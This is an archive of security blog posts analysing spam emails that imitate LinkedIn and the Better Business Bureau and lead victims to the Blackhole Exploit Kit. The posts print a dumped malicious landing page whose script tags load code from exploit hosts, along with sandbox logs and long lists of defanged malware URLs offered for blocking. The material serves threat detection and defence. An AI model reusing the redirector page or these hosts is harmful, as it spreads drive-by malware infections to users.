Category Archives: Security

Express LinkedIn Mail: spread Blackhole Exploit Kit URLs

We have received few emails that looked like to be sent from LinkedIn:

Email

But after checking email header details it was clearly a spam:

Return-Path: trtro@www.trt.ro
Received: from vps136.whmpanels.com (unknown [89.42.219.181])
Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com
Date: Fri, 30 Mar 2012 21:37:47 +0100
From: "Support" trtro@www.trt.ro
Subject: Express LinkedIn Mail

The A HREF links redirect to 3 different malicious URLs:

hxxp:// groupehydrogaz .com/20sZhJqa/index.html
hxxp:// dealerpos .com/uFj7A93z/index.html
hxxp:// hobbyconcept666.yellis .net/20sZhJqa/index.html

URLVoid reports:

http://www.urlvoid.com/scan/groupehydrogaz.com/
http://www.urlvoid.com/scan/dealerpos.com/
http://www.urlvoid.com/scan/hobbyconcept666.yellis.net/

The page content dumped from one of these malicious URLs looks like:

Dumped Content

That content looks like the spread-style of Blackhole Exploit Kit.

Other malicious URLs are:

hxxp:// ftp.planitur .com.br/dyEmcL4N/js.js
hxxp:// quiztown .org/U2iBLpvu/js.js
hxxp:// wap .tl/8M6kMfpV/js.js
hxxp:// laspeziacaritas .it/1M4VoeVe/js.js

URLVoid reports:

http://www.urlvoid.com/scan/ftp.planitur.com.br/
http://www.urlvoid.com/scan/quiztown.org/
http://www.urlvoid.com/scan/wap.tl/
http://www.urlvoid.com/scan/laspeziacaritas.it/

Pay always attention when opening known and unknown emails:

1) Always analyze email headers to see who sent the email
2) Scan links with our service http://www.urlvoid.com/
3) Do not download unknown files
4) Avoid to open emails that have subject related to pharmaceutical products
5) Avoid to open emails that have subject related to sexual content
6) When emails are from your Bank, always call your Bank before open the email

Spam “Your updated information is necessary” leads to Blackhole Exploit Kit

We have received various spam emails that simulate messages from Better Business Bureau (BBB), but in real are used to spread malicious links that leads to Blackhole Exploit Kit. The subject of the emails looks like this:

Your updated information is necessary

A screenshot of the email:

Image

Other details of the emails:

Return-Path: <top-team3@ms16.hinet.net>
Received: from msr6.hinet.net (msr6.hinet.net [168.95.4.106])
Received: from ms16.hinet.net ([178.206.55.126])
Date: Thu, 26 Jan 2012 22:49:15 +1000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.7) Gecko/20100713 Lightning/1.0b2 Thunderbird/3.1.1
Subject: Your updated information is necessary

The link present in the email:

hxxp://app.alaskaoregonwe sternwashington.bbb.org/sbq

Redirects users to the malicious link:

hxxp://circutor .com/4ethe8ep/index.html

The dumped content of the malicious link is:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://diamondservice.com .au/B0bifDVW/js.js"></script>
<script type="text/javascript" src="hxxp://therefugees.altervista .org/wqWcKZ8w/js.js"></script>
<script type="text/javascript" src="hxxp://www.rentacandle.com .au/4SvXUuz4/js.js"></script>
 
</html>

Extracted malicious links (active as of now) that lead to Blackhole Exploit Kit are:

hxxp://diamondservice.com .au/B0bifDVW/js.js
hxxp://www.rentacandle.com .au/4SvXUuz4/js.js

We have analyzed the malicious link with our sandbox, and this is the report:

Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 213.229.188.210 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - circutor .com - /4ethe8ep/index.html
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 203.210.112.33 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - diamondservice .com.au - /B0bifDVW/js.js
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\8YPELNXD\js[1].js - 7A6BC5BCB465D4C54CA3D185FD5D45F0 - 75 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 50.116.33.235 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron .com - /search.php?page=ac2393a35636dfa1
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\VBPHH91D\search[1].htm - D2EE09D5DBE3B22B66CFF67B81999E55 - 2048 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 65.55.13.243 - 80
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - activex.microsoft .com - /objects/ocget.dll
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Adobe\Flash Player\AssetCache\N6MCDZF7
File Modified - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %Temp%\hsperfdata_%UserName%\856 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Sun\Java\Deployment\deployment.properties - 2EDE01E8DF28D3DC2BF961089BC9A241 - 635 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - TCP - 64.4.52.169 - 80
Process Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %ProgramFiles%\Java\jre6\bin\java.exe - Sun Microsystems, Inc. - D600A0D8FACA5158CA8B221006997808 - 144792 bytes
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - codecs.microsoft .com - /isapi/ocget.dll
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\hsperfdata_%UserName%\2016 - NOTHING TO HASH - 0 bytes - attr: [] - -
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\java_install_reg.log
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\Q96OL02U\CAWNUS4D.HTM - CE9C2ED4F9D2B2AABE2F39FFBBB4D585 - 1176 bytes - attr: [-normal] - -
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\Sun\Java\Deployment
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\log
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\security
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\ext
Directory Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\tmp
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\deployment.properties - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - C:\WINDOWS\explorer.exe - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - Microsoft Corporation - 55794B97A7FAABD2910873C85274F409 - 93184 bytes
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\d3d9caps.dat - C9508CA14563A81666441FF191D9BB24 - 664 bytes - attr: [] - -
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012010920120116\
File Deleted - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\index.dat - 32768 bytes
Directory Removed - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012011420120115\
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %History%\History.IE5\MSHist012012012820120129\
Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php
Process Created - C:\WINDOWS\explorer.exe - C:\WINDOWS\system32\verclsid.exe - Microsoft Corporation - 91790D6749EBED90E2C40479C0A91879 - 28672 bytes
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\#SharedObjects\FMGLCCCK
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer
Directory Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %AppData%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /content/field.swf
File Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %InternetCache%\Content.IE5\G55SBTS1\field[1].swf - 2435793EE73EFDAF79541977B3C08EEB - 1490 bytes - attr: [] - -
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 5152
Connection Established - C:\WINDOWS\explorer.exe - TCP - 127.0.0.1 - 1079
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.12.249 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - www.microsoft .com - /isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Connection Established - C:\WINDOWS\explorer.exe - TCP - 65.55.206.209 - 80
Web Request - C:\WINDOWS\explorer.exe - GET - home.microsoft .com - /
Connection Established - C:\WINDOWS\explorer.exe - TCP - 94.245.115.205 - 80
Connection Established - %ProgramFiles%\Java\jre6\bin\java.exe - TCP - 50.116.33.235 - 80

Malicious urls extracted:

diamondservice .com.au - /B0bifDVW/js.js
matorbaron .com - /search.php?page=ac2393a35636dfa1
kosmovodki .ru - /statnl/image.php
matorbaron .com - /content/field.swf

As we can see, malicious code is injected in the system process wuauclt.exe:

Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php

Blackhole exploit kit requests:

matorbaron .com - /search.php?page=ac2393a35636dfa1
matorbaron .com - /content/field.swf

Download dumped network traffic (password is urlvoid.com):

sniffed.zip / 17 KB

Sandbox: Malicious URLs

Below there is a list of malicious URLs grabbed from our sandbox that analyzed few recent malware samples, we highly recommend to block these domains with a firewall and with the hosts file (C:\WINDOWS\system32\drivers\etc\hosts).

hxxp://195.189.226.104/ftp/g.php
hxxp://outkxmkcxkxqqmy. org/news/?s=36052
hxxp://poohfsngrxnlnkr. net/news/?s=167574
hxxp://poohfsngrxnlnkr. biz/news/?s=122180
hxxp://oyjqvypmksfasmet. info/news/?s=196250
hxxp://kastakasta. info/job2/fig.bin
hxxp://flowersinamew. com/pof/deq.nk
hxxp://zz.cdbeta. com/
hxxp://vip.cdbeta. com/yzm.asp
hxxp://vip.cdbeta. com/jiancewangluo.asp
hxxp://vip.cdbeta. com/sjy6553-user/dufuwuqipeizhi.asp?yanzheng=73eb6acbc1b8c97bc580c32368731770
hxxp://zz.cdbeta. com/wp-content/themes/g-white/style.css
hxxp://zz.cdbeta. com/wp-content/themes/g-white/js/all.js
hxxp://zz.cdbeta. com/wp-content/themes/g-white/images/bg_footer.png
hxxp://zz.cdbeta. com/wp-content/themes/g-white/images/bg_top.png
hxxp://zz.cdbeta. com/wp-content/themes/g-white/images/sprite.gif
hxxp://zz.cdbeta. com/wp-content/themes/g-white/images/bg_footer_mid.png
hxxp://zz.cdbeta. com/wp-content/themes/g-white/images/bg_middle.png
hxxp://www.cdbeta. com/gonggao.html
hxxp://www.cdbeta. com/cms.css
hxxp://psfk. com/img/icons/facebook.png?v10=89&tq=gHZutDyMv5rJejXia9nrmsl6giWz%2BJZbVyA%3D
hxxp://resetmymemory. com/blog/images/3521.jpg?v54=14&tq=gKZEtzyMv5rJqxG1J42pzMffBfQo1%2BjbwvgS917W65rJqlLfgPiWW1cg
hxxp://worldmotoblo. com/blog/images/3521.jpg?v56=94&tq=gKZEtzyMv5rJqxG1J42pzMffBfQo1%2BjbwvgS917X65rJqlLfgPiWW1cg
hxxp://zonedg. com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrc%2FR5SOeikL50gGpKl%2F223gX3Hjzh%2B7KtA%2FYYO%2BaO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
hxxp://zonedg. com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrc%2FR5SOeikL50gGpKl%2F223gX3Hjzh%2B7KtA%2FYYO%2BaO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
hxxp://focotricot.zapto. org/
hxxp://rinaldo.vallecchi.sites.uol. com.br/maria.jpg
hxxp://pathla.notlong. com/
hxxp://dl.dropbox. com/u/44598175/pahtlar.txt
hxxp://greenherbalteaonline. com/images/greenherbalteagirlholdingcup250.gif?v13=47&tq=gHZutDyMv5rJeTfia9nrmsl6giWz%2BJZbVyA%3D
hxxp://wwwmediaportal. com/blog/images/3521.jpg?v83=60&tq=gKZEtzyMv5rJqxG1J42pzMffBvIv3ejbwvgS917W65rJqlLfgPiWW1cg
hxxp://wwwmediaportal. com/blog/images/3521.jpg?v16=40&tq=gKZEtzyMv5rJqxG1J42pzMffBvIv3ejbwvgS917X65rJqlLfgPiWW1cg
hxxp://the.veee.googlepages. com/U4z.exe
hxxp://3512456308488421436-a-1802744773732722657-s-sites.googlegroups. com/site/theveee/U4z.exe?attachauth=ANoY7cr7llA_aDedPKvsz2ah8igzqhC_uJrtkJvhS1_bxnUGZgG4vg-wM2FabhS4vnsolOEQ3zFHO23w-bHCqGHgvpznme7oy3DG13WO-F_h0TIggifpkT8TlZmS4qKW4yJOEV72RZo33DbjvD8hgJW2gutMTyesNfYpjWsITlO8c39ufLJIOCTccYUllH1iQjYLcdIndo9s&attredirects=0
hxxp://data.fuskbugg.se/skalman02/4e28ae2064f07_av.txt
hxxp://e3bea872ae.in/index.html?nhSzgFtkRb5wnotgO6UKDmHodcn2lOv1rpXwyxV8PzQkTBFxwx93nCNG0zFc8zKN6cZOwpeeEw==
hxxp://150d064880. com/index.html?nhSzgFtkRb5wnotgO6UKDmHodcn2lOv1rpXwyxV8PzQkTBFxwx93nCNG0zFc8zKN6cZOwpeeEw==
hxxp://150d064880. com/index.html?nhSzgFtkRb5wnotgO6UKDmHodcn2lf6x4pry2kovOzB2HgE10hN2gyhH1yJZ+Gra5ZBCj4eOTw==
hxxp://184.171.168.194/click.php?c=f10ca497e80b31c8a19f50625807c1853dd96c7f433afe8ec5d67846ac0985c27346f5786464d3bfe6403e7495c883118fef67336d9f4ce547f87ff76c1e32fbeb93b3e3168edabebfd1fd24989911cae4bcc14cad75fafe32acaa264a71df6cea5da8c9fc5a6f95c118d919e1ea30d4
hxxp://feed.bizzclick. com/click.php?id=qEUD2kYbC0pzF8QVMao-QLDJPn1yKssCozS-Fxxd37iU05DmcESX2b7hYqYgah_j7cGTjDBCdCg3aKaLgPNCMHc%2C
hxxp://74.117.177.149/go.php?uid=56436&suid=3156&data=z0kfwAHNKgOxDneiErCY%2BFnIBubj1MAJCjZnUVtRREjZcpnjQL2NhG9UzUvtI95LGMogaw34AKuTSt1jURkg%2FkRAMdJpHnUlb1RsR4E9yJuk%2BWpyqggq%2FH6lZtc1o%2FqLwQ%2BQKZ7Sh5%2B73AVRLHJ9ecChAGoK7RDENOs3OR%2BIkx1LhEm90r4%2Bfsnao2H8xIF7qjgW4eu3QiUr1cOvNiz3SKSlSsh5M6MK0RYsuIxqY9XFJZn77q2Gt9GtnyZGZxVdRz%2BBjA83RtJcWEAXbuU2s6%2FiAYqGNS4w8Mio3PVxe3N2Z4ddOe3lINFH1%2BYzW3j0aedzY6gnroGgYRvbd4oIIz%2F4fqR%2BrRkIY2JsAZTsffHKcD6epIesh0T9dvWAKvWpCR1YV6yUwRgyDEhOtuWLnX%2B5gemRuQNLqoC9p5EbT7xgj%2F80MJQKaUcjItiTF4bzWYVLSN6xC1uKoH4MJRIJ%2F%2F0O4xCRfEz69KSeKoU4PJhTlaRufQL4u2TF%2BBIV1B%2FkDXXGO%2FendwOGjrQ6Lnn46pZE1kdx9%2BeLAwVDb%2BmXBJOwNC0A84Yp7BssgDU2IDUjm0hlBcm%2FzVLQ0yXxOcBYce%2BgrvL8PElGx8G%2BK%2FXhpuIL%2BqqBM%2FczR9%2FLbFz8XjLP20HUvxiU%2F0y5vhyNJ6aq87XMaRceu5qGVLXbRxfug1M0t8daj8E8LwSfpBSmQRzCajkxdflDQed%2Fi%2BiMffU1M7Zwo9otFHUQdFL%2BtjfNVpYl93eEyoGWAIfUNSFpGUPW0IOiZ8cjPBESUsBy%2B5hIVkU8m8qYTiZc8ZMT1QD8MlPhaABeYg%2BR37TYgSQ96ZoWgyXfWuvdhRY066frqXpSub9Opi6CyeuH4sEKjZTWBy4lxvDynQQYDPEd87jtx6W%2F0Hjyq15TM1Q2%2FV9LYA
hxxp://grupolarepublica.dyndns-pics. com/New.exe
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=13
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=1
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=21
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=4
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=5
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=6
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=7
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=8
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=23
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=24
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=25
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=26
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=27
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d9edc46028415f463&a=11
hxxp://wnejjzzh. cn/bad.php?w=192&fail=0&i=a7157a4db6097a4d9edc46028415f463
hxxp://bentseather.be.funpic. de/azenv.php
hxxp://chillly.ch.ohost. de/aze/azenv.php
hxxp://www.pr0. net/deny2/azenv.php
hxxp://outkxmkcxkxqqmy. org/news/?s=60740
hxxp://nqjmyrrrmvxrunr. info/news/?s=130138
hxxp://nqjmyrrrmvxrunr. com/news/?s=175288
hxxp://tjybqpmnodvvjekq. biz/news/?s=88786
hxxp://freshmediaportal. com/blog/images/3521.jpg?v67=41&tq=gL5HtzyMv5rJsxG1J4Xo2rCxB%2FYpwr7UxUrEgPiWW1cg
hxxp://monochrom. at/polytheism/pictures/TanzenderShiva.jpg?v26=13&tq=gKZEtzyyXciFpAniMqv4Dju6%2FkJI3aOL6nigEp66Q%2BOBuIL%2FVtJ96i8piqu70ZtZSeA3pAgCHol%2Ftg%2Fvmam3X0U9W6xVAtPdFDXlHuDUkhOGPRp6m4ws%2Fgc%2BFe6cCccg8cOzF6L2Oyxg8hzo%2BQOldu%2B0Udxajx8qf0NpMthxth3TbbEAVpoqXnhmuA%2BVKxXDVQ8PDNrMq5GoVEDLULmCVSsd5NKWgmVzG6DtTlSRt%2FHnRmaSi%2Bw3A3JhdO7kMXfBb5KKj6%2FGd9iX4IwaoLuPAef6DL6J3Mb28W5vcWY1j6ACxztuN5IT8QWwTLwL
hxxp://fastblogportal. com/blog/images/3521.jpg?v97=82&tq=gKZEtzyMv5rJqxG1J42pzMffBfQo1%2BjbwvgS917W65rJqlLfgPiWW1cg
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=13
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=1
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=21
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=4
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=5
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=6
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=8
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=23
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=24
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=25
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=26
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=27
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=7
hxxp://wnejjzzh. cn/stat2.php?w=192&i=a7157a4db6097a4d34f79f16e6fa1107&a=11
hxxp://wnejjzzh. cn/bad.php?w=192&fail=0&i=a7157a4db6097a4d34f79f16e6fa1107
hxxp://cns-soares.sites.uol. com.br/maria.jpg
hxxp://coolmediaportal. com/blog/images/3521.jpg?v67=41&tq=gL5HtzyMv5rJsxG1J4Xo2rCyAfEjwr7UxUrEgPiWW1cg
hxxp://nationsautoelectric. com/images/50-217-1_F_1_.jpg?v89=30&tq=gKZEtzyj5KKfVGqGJstjEFFr4GpNm%2F0KcWHH802g%2B%2BiA5HiueDoqF%2Fh5sQc98KvIPyWyw1ephZCJj1TtxddEOhHnA37qd1HwFDDEwR0mqFxjb4EpMhTYnRAc%2BhN7PpEqHzWlEwC%2Bfp42q4%2FK23UPZ5UBu4bZcPudcpW816OaKtfpXdK54HmRrAK%2BWjtrMOMyMONyKXhiy4ukrPueZ5SFlNs6AKLalNoRfIBuMvD9g0tRs2zgh2gUQKAezV9Ox2IgeA6ZBq8TbIkWk6gnYkYlyePR4sKu3w1KQeCbzxTNrcabbE%2FdHsCh
hxxp://coolmediaportal. com/blog/images/3521.jpg?v6=32&tq=gKZEtzyMv5rJqxG1J42pzMffBvIv3ejbwvgS917W65rJqlLfgPiWW1cg
hxxp://zonedg. com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSvd%2BFuTLiv0agD8mw854mx2XSGGkrhjcLfdYAdTZTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
hxxp://zonedg. com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSvd%2BFuTLiv0agD8mw854mx2XSGGkrhjcLfdYAdTZTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
hxxp://3512456308488421436-a-1802744773732722657-s-sites.googlegroups. com/site/theveee/U4z.exe?attachauth=ANoY7crdWvXZF3BRtL76dYyOLwTfyxpIBw3htUrU8RKiNlHNcYF0ApuWgnvav57XY9SvpTgIpgAzpMaijCxELH4QIOHZoRhVT0bwVwzu0Cy9qthcxEIjsGfxmrwjVkKgUiYlELYo1l-zkI1w-AGJPj7uMCzim9KqMfoYBhbxNfIJFYZyYeCESBfNvi1vomhZTQzP0iTtNUhW&attredirects=0
hxxp://e3bea872ae.in/index.html?nhSzgFtkRb5wnohgO6UKDmHodcn2lOv1rpXwyxV8PzQkTBFxwx93nCNG0zFc8zKN6cZOwpeeEw==
hxxp://150d064880. com/index.html?nhSzgFtkRb5wnohgO6UKDmHodcn2lOv1rpXwyxV8PzQkTBFxwx93nCNG0zFc8zKN6cZOwpeeEw==
hxxp://150d064880. com/index.html?nhSzgFtkRb5wnohgO6UKDmHodcn2lf6x4pv53kwuNDJ1GQE10hN2gyhH1yJZ+Gra5ZBCj4eOTw==
hxxp://onlineinstitute. com/g7/images/logo3.jpg?v5=60&tq=gJ4WK%2FSUh5TBhRMw9YLJmMSTUivqg4aUzZtEfqHXarVJ%2BQhhYGg%3D
hxxp://calaculat. com/blog/images/3521.jpg?v99=85&tq=gKZEtzyMv5rJqxG1J42pzMffBvIv3ejbwvgS917W65rJqlLfgPiWW1cg
hxxp://zonedg. com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSvd%2BFuTLiv0agD8mw854mx2XSGGkrhjcLfdYAdTZTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
hxxp://zonedg. com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSvd%2BFuTLiv0agD8mw854mx2XSGGkrhjcLfdYAdTZTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNx1Kv975Xlm5G
hxxp://file4exchange. com/blog/images/3521.jpg?v32=65&tq=gKZEtzyMv5rJqxG1J42pzMffBvIv3ejbwvgS917X65rJqlLfgPiWW1cg
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=13
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=1
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=21
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=4
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=5
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=6
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=7
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=8
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=23
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=24
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=25
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=26
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=27
hxxp://wnejjzzh. cn/stat2.php?w=143&i=a7157a4db6097a4da3022328093e0123&a=11
hxxp://wnejjzzh. cn/bad.php?w=143&fail=0&i=a7157a4db6097a4da3022328093e0123
hxxp://78.189.218.14/zeus/config.bin
hxxp://28chejil. com/startpage
hxxp://28chejil. com/startpage/
hxxp://28chejil. com/startpage/make_result2.asp
hxxp://28chejil. com/startpage/down/spoolsvc.exe
hxxp://28chejil. com/startpage/getwork1.txt
hxxp://28chejil. com/startpage/getwork2.txt
hxxp://28chejil. com/startpage/getwork3.txt
hxxp://28chejil. com/startpage/make_result.aspPopupType=1&UserData=

